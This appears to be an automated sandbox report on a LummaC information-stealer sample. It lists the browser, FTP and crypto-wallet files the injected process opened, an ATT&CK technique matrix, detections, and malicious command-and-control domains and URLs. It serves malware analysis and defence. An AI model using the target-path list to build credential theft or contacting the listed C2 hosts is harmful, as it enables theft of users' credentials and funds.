Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior

Source: Yara match	File source: 00000002.00000003.1822946164.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 2492, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 2492, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	23 Virtualization/Sandbox Evasion	LSASS Memory	351 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	23 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	4 Obfuscated Files or Information	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ReploidReplic.exe	61%	ReversingLabs	Win32.Spyware.Lummastealer
ReploidReplic.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\gdi32.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\gdi32.dll	68%	ReversingLabs	Win32.Trojan.LummaStealer

Source	Detection	Scanner	Label
https://abruptyopsn.shop/apil	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/api3L	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/api	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/Y	100%	Avira URL Cloud	malware
ingreem-eilish.biz	0%	Avira URL Cloud	safe
http://crl.microsoft.	0%	Avira URL Cloud	safe
https://abruptyopsn.shop/Q	100%	Avira URL Cloud	malware
https://abruptyopsn.shop:443/api	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/s	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/apiF9	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/	100%	Avira URL Cloud	malware
https://abruptyopsn.shop/apiHP2	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
abruptyopsn.shop	104.21.48.1	true	true	unknown
nearycrepso.shop	unknown	unknown	true	unknown
ingreem-eilish.biz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
rabidcowse.shop	false		high
wholersorie.shop	false		high
https://abruptyopsn.shop/api	true	Avira URL Cloud: malware	unknown
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
nearycrepso.shop	false		high
ingreem-eilish.biz	true	Avira URL Cloud: safe	unknown
framekgirus.shop	false		high
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://abruptyopsn.shop/Q	aspnet_regiis.exe, 00000002.00000003.1793722966.0000000005206000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1793743243.000000000520C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1794325694.000000000520F000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://abruptyopsn.shop/apiF9	aspnet_regiis.exe, 00000002.00000002.1858796383.0000000002CEB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://abruptyopsn.shop/api3L	aspnet_regiis.exe, 00000002.00000003.1765757138.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://abruptyopsn.shop/apil	aspnet_regiis.exe, 00000002.00000003.1765757138.0000000002C8A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.5.dr	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	aspnet_regiis.exe, 00000002.00000003.1793392257.0000000005257000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766844349.00000000052A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766976913.0000000005257000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	aspnet_regiis.exe, 00000002.00000003.1793392257.0000000005257000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766844349.00000000052A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766976913.0000000005257000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://abruptyopsn.shop/Y	aspnet_regiis.exe, 00000002.00000003.1765757138.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	aspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft.	aspnet_regiis.exe, 00000002.00000003.1848093457.0000000002C96000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1822946164.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://abruptyopsn.shop:443/api	aspnet_regiis.exe, 00000002.00000002.1859335137.0000000005218000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1765757138.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1847974851.0000000005218000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://abruptyopsn.shop/s	aspnet_regiis.exe, 00000002.00000003.1848294035.0000000002CF4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://x1.c.lencr.org/0	aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	aspnet_regiis.exe, 00000002.00000003.1766976913.0000000005232000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.microsof	aspnet_regiis.exe, 00000002.00000003.1766844349.00000000052A5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	aspnet_regiis.exe, 00000002.00000003.1805901435.000000000523D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	aspnet_regiis.exe, 00000002.00000003.1766976913.0000000005232000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	aspnet_regiis.exe, 00000002.00000003.1807513470.000000000532B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	aspnet_regiis.exe, 00000002.00000003.1766549122.0000000005249000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1766485327.000000000524B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://abruptyopsn.shop/	aspnet_regiis.exe, 00000002.00000002.1858835809.0000000002CFE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://abruptyopsn.shop/apiHP2	aspnet_regiis.exe, 00000002.00000003.1804951361.0000000002D02000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.48.1	abruptyopsn.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582548
Start date and time:	2024-12-30 21:08:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ReploidReplic.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/7@3/1
